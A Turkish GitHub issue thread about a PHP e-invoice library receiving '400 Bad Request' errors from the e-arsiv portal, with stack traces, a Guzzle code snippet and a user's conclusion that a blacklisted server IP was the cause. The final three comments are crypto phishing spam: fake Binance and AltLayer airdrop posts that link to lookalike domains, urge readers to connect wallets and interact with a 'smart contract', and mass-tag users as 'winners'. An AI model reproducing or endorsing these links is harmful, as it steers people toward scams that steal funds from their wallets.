### ISSUE TITLE
400 Bad Request Hatası

### ISSUE THREAD

**Issue by muglali20** [furkankadioglu/efatura#97]
Merhaba; Elinize sağlık gerçten çok faydalı olmuş.
Benım sorunum dosyarı hosta attıgımda hem testte hemde canlıda aşağıdakı hatayı alıyorum bununla ılgılı destek olabılır mısınız sorun nedır acaba daha once karşılaşan varmı ?

atal error: Uncaught GuzzleHttp\Exception\ClientException: Client error: `POST https://earsivportaltest.efatura.gov.tr/earsiv-services/esign` resulted in a `400 Bad Request` response: <html><head><title>Error</title></head><body> <h2>ERROR: </h2> <br> </body></html> in /home/efatura/public_html/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113 Stack trace: #0 /home/efatura/public_html/vendor/guzzlehttp/guzzle/src/Middleware.php(69): GuzzleHttp\Exception\RequestException::create(Object(GuzzleHttp\Psr7\Request), Object(GuzzleHttp\Psr7\Response), NULL, Array, NULL) #1 /home/efatura/public_html/vendor/guzzlehttp/promises/src/Promise.php(204): GuzzleHttp\Middleware::GuzzleHttp\{closure}(Object(GuzzleHttp\Psr7\Response)) #2 /home/efatura/public_html/vendor/guzzlehttp/promises/src/Promise.php(153): GuzzleHttp\Promise\Promise::callHandler(1, Object(GuzzleHttp\Psr7\Response), NULL) #3 /home/efatura/public_html/vendor/guzzlehttp/promises/src/TaskQueue.php(48): GuzzleHt in /home/efatura/public_html/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php on line 113

**Comment by guncag** [comment]
Merhaba,
bende sunucuda 

`Client error: `POST https://earsivportal.efatura.gov.tr/earsiv-services/assos-login` resulted in a `400 Bad Request` response:\n<html><head><title>Error</title></head><body>\r\n<h2>ERROR: </h2>\r\n<br>\r\n</body></html>\n `

hatası ile karşılaşıyorum.

**Comment by metin71** [comment]
aynı sorun bendede mevcuttur düzeltebilen varmı?.. portal bağlantı urlsi dogru sanırım geldiği sayfa adresinde güncelleme yaptılar. ondan kaynaklı sorun yaşıyoruz..

**Comment by ahmetaksoy1985** [comment]
> aynı sorun bendede mevcuttur düzeltebilen varmı?.. portal bağlantı urlsi dogru sanırım geldiği sayfa adresinde güncelleme yaptılar. ondan kaynaklı sorun yaşıyoruz..

Ben C# ile yazdım. Aktif olarak kullanıyorum. getCompanyInfo boş dönmesi dışında bir değişiklik görmedim son zamanda. $parameters kısmını "form_params" altında değil direk $url + urlencode($parameters) şeklinde post ediyorum.

**Comment by metin71** [comment]
> > aynı sorun bendede mevcuttur düzeltebilen varmı?.. portal bağlantı urlsi dogru sanırım geldiği sayfa adresinde güncelleme yaptılar. ondan kaynaklı sorun yaşıyoruz..
> 
> Ben C# ile yazdım. Aktif olarak kullanıyorum. getCompanyInfo boş dönmesi dışında bir değişiklik görmedim son zamanda. $parameters kısmını "form_params" altında değil direk $url + urlencode($parameters) şeklinde post ediyorum.

dediğinizi tam olarak anlamadım.. fakat. aşağıdaki kodları düzenleyip birşeyler denedim olmadı.. sizin söylediğiniz gibi olması için.. ama düzelen birşey olmadı..

    private function sendRequestAndGetBody($url, $parameters, $headers = null)
    {
         $response = $this->client->post($this->getBaseUrl() . "$url", [
            "headers" => $headers ? $headers : $this->headers,
            "form_params" => $parameters
        ]);
        $body = json_decode($response->getBody(), true);
       return $body;
    }

**Comment by ahmetaksoy1985** [comment]
Kodlarda problem oluştu sanmıştım. Kurdum denedim. Bende çalışıyor. PHP 8.1.6 version. XAMPP üzerinden çalıştırdım. VS Code üzerinde debug ettim.

**Comment by metin71** [comment]
php 5.6 versiyonunda çalışıyoruz.. yazılımımız buna uygun 8 versiyonuna geçiş çok sıkıntı olur..

**Comment by muratcesmecioglu** [comment]
Sunucumda php 7.3 var. Test sayfasından fatura oluşturup indirebiliyorum.

Aktif bir keseceğim fatura olmadığı için canlı sistemi şimdilik test edemiyorum. Ancak bağlanıp portaldan kestiğim faturaları imzaladığım bir sistemim daha var. Burada sisteme bağlanıp, kestiğim faturaları ekrana getirebiliyorum. Bir problem gözükmüyor.

**Comment by ztemet** [comment]
> php 5.6 versiyonunda çalışıyoruz.. yazılımımız buna uygun 8 versiyonuna geçiş çok sıkıntı olur..

Sorun php versiyonuyla alakalı değil. Sorunun kaynağı farklı bir durum aynı anda birçok kişide aynı problem çıkması garip bir durum

**Comment by metin71** [comment]
> Sunucumda php 7.3 var. Test sayfasından fatura oluşturup indirebiliyorum.
> 
> Aktif bir keseceğim fatura olmadığı için canlı sistemi şimdilik test edemiyorum. Ancak bağlanıp portaldan kestiğim faturaları imzaladığım bir sistemim daha var. Burada sisteme bağlanıp, kestiğim faturaları ekrana getirebiliyorum. Bir problem gözükmüyor.

güncel indir php 7 olan farklı sunucuda denedim aynı hatayı alıyorum.. GuzzleHttp den kaynaklı bir durum var sanırım ama anlayamadım..



[16-Sep-2022 01:52:19 Europe/Istanbul] PHP Fatal error:  Uncaught GuzzleHttp\Exception\ClientException: Client error: `POST https://earsivportaltest.efatura.gov.tr/earsiv-services/esign` resulted in a `400 Bad Request` response:

**Comment by metin71** [comment]
sorun gördüğüm kadarıyla sunucu kaynaklı. local sunucuda curl ile login olup token olan curl kodu. sunucu üzerinde çalışmıyor.

gib sistemine login olup token alan local sunucumuzda curl farkları aşağıdaki gibidir.. çalışan arkadaşlar kontrol sağlayıp bilgi verebilir mi bu konuda ?

Farklar
IDN Yes olması gerekiyor
SSPI Yes - olması gerekiyor
TLS-SRP No - olması gerekiyor

**Comment by metin71** [comment]
arkadaşlar sorun kodlardan değil ip adresinin kara listeye alınması ile alakalıdır. aşağıdaki adresten sunucu ip adresini kontrol edip kara listede görünüyorsa talep açın düzeltince sorun kalmıyor.

https://www.brightcloud.com/tools/url-ip-lookup.php

**Comment by roneyfraga** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @falconzyx, @Texas86, @KickItLikeShika, @jensdc92, @DariuszO, @sohamxz, @Parsbitx

**Comment by roneyfraga** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Cyb3rNeTiX666, @steal-7126, @bzkrtumut, @MahdiYasini, @rtrys, @czp3009, @floflo989

**Comment by 1250285** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @maledicente, @MSC19950601, @forexpiphunter, @suprnurd, @nullun, @aareader, @OhadHayoun, @guign, @fadyelgawly, @goatwithfire, @Breinich, @Oguele33, @platkaw, @evilnatas, @TanviManchanda, @evido3s, @thetorment, @corwien, @mavieth, @stanlee321
